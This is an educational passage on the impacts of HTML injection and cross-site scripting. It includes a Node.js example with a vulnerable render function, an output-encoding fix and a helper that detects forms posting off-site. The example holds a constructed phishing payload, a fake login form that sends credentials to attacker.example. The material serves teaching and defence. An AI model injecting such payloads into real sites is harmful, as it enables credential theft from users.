1. Fake Content / UI Manipulation: HTML injection lets an attacker place their own markup into a page the site serves, changing what users see and misleading them with content that appears to come from the legitimate site.
2. Phishing Attacks: Injected login forms, warnings or messages render inside the real page, on the real domain, and can trick users into entering credentials or personal data that the attacker's form then submits to a host they control.
3. Website Defacement: Injected markup can replace or overlay visual elements and messages, embarrassing the organization and damaging its brand.
4. Data Leakage: Injected links, forms, images or unclosed tags (dangling markup) can silently send user input, or page content that follows the injection point, to attacker-controlled sites, with no JavaScript required.
5. Escalation to XSS: If the injection point accepts script-bearing markup (a script tag, an event-handler attribute such as onerror, or a javascript: URL), the HTML injection is already Cross-Site Scripting; even where script tags are filtered, injected markup can often be combined with other weaknesses so that code is executed indirectly.
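The following Node.js snippet is an added example, not code from the original article: it shows an HTML-injection sink, the script-free phishing form it enables (items 1, 2 and 4 above), the output-encoding fix, and a small check that lists form targets pointing off-origin. The hostnames, the payload and the helper names are constructed for illustration.

```javascript
// Added example (not from the original article): an HTML-injection sink, the
// phishing payload it enables, and the output-encoding fix. All names,
// URLs and the sample payload are constructed for illustration.

// Vulnerable: user-controlled text is concatenated straight into markup.
function renderGreetingVulnerable(displayName) {
  return `<p>Welcome back, ${displayName}!</p>`;
}

// Hardened: encode the five characters that can change HTML context before
// the value reaches the page (the same idea as a template engine's autoescape).
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderGreetingSafe(displayName) {
  return `<p>Welcome back, ${escapeHtml(displayName)}!</p>`;
}

// Constructed phishing payload: no <script> at all, just a fake login form
// whose action points at an attacker-controlled host. The browser submits
// the typed credentials there when the victim clicks "Sign in".
const PHISHING_PAYLOAD =
  'guest</p><form action="https://attacker.example/collect" method="POST">' +
  "<p>Your session expired. Please sign in again.</p>" +
  '<input name="user"><input name="pass" type="password">' +
  "<button>Sign in</button></form><p>";

// Detection helper: list the action target of every <form> in rendered markup
// and return those that do not resolve to the site's own origin. Usable as a
// unit-test assertion on templates or as a crude page-integrity check.
function foreignFormActions(html, allowedOrigin) {
  const foreign = [];
  const re = /<form\b[^>]*\baction\s*=\s*["']([^"']*)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const target = m[1];
    let origin;
    try {
      origin = new URL(target, allowedOrigin).origin; // relative URLs stay on-site
    } catch {
      origin = null; // unparsable target: treat as foreign
    }
    if (origin !== allowedOrigin) foreign.push(target);
  }
  return foreign;
}

const SITE_ORIGIN = "https://shop.example";

// Vulnerable render: the injected form survives and posts off-site.
const unsafeHtml = renderGreetingVulnerable(PHISHING_PAYLOAD);
console.log(foreignFormActions(unsafeHtml, SITE_ORIGIN)); // [ 'https://attacker.example/collect' ]

// Safe render: the angle brackets are encoded, so no form element exists.
const safeHtml = renderGreetingSafe(PHISHING_PAYLOAD);
console.log(foreignFormActions(safeHtml, SITE_ORIGIN)); // []
```

The check in foreignFormActions is deliberately regex-based so it runs without a DOM; in a browser the same idea is better expressed as a query over document.forms, and a Content-Security-Policy form-action directive enforces the same restriction at the browser level.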
1. Credential Theft: Script running in the site's origin can read session cookies that were set without the HttpOnly flag, tokens kept in localStorage or sessionStorage, and anything the user types into the page, including login credentials.
2. Account Hijacking: With a stolen session cookie or token, the attacker can replay it and impersonate the user, reaching private accounts and data until that session is invalidated.
3. Malware Delivery: XSS can load additional scripts or redirect users to exploit kits or infected sites while the address bar still shows the trusted domain.
4. Unauthorized Actions (CSRF Bypass): Because the injected script runs in the victim's origin, it can read the anti-CSRF token from the page and submit authenticated requests that carry it. Token-based CSRF defenses therefore offer no protection against XSS, however well they are implemented; the fix is to remove the XSS.
5. Full Site Compromise (Admin Panel Attacks): If a stored payload is rendered in a page an administrator views, the script runs with the administrator's privileges and can change site settings, create accounts, or upload a backdoor, handing the attacker control of the backend.
6. Reputation and Legal Risks: Exploited XSS vulnerabilities lead to data breaches, lawsuits, and loss of customer trust.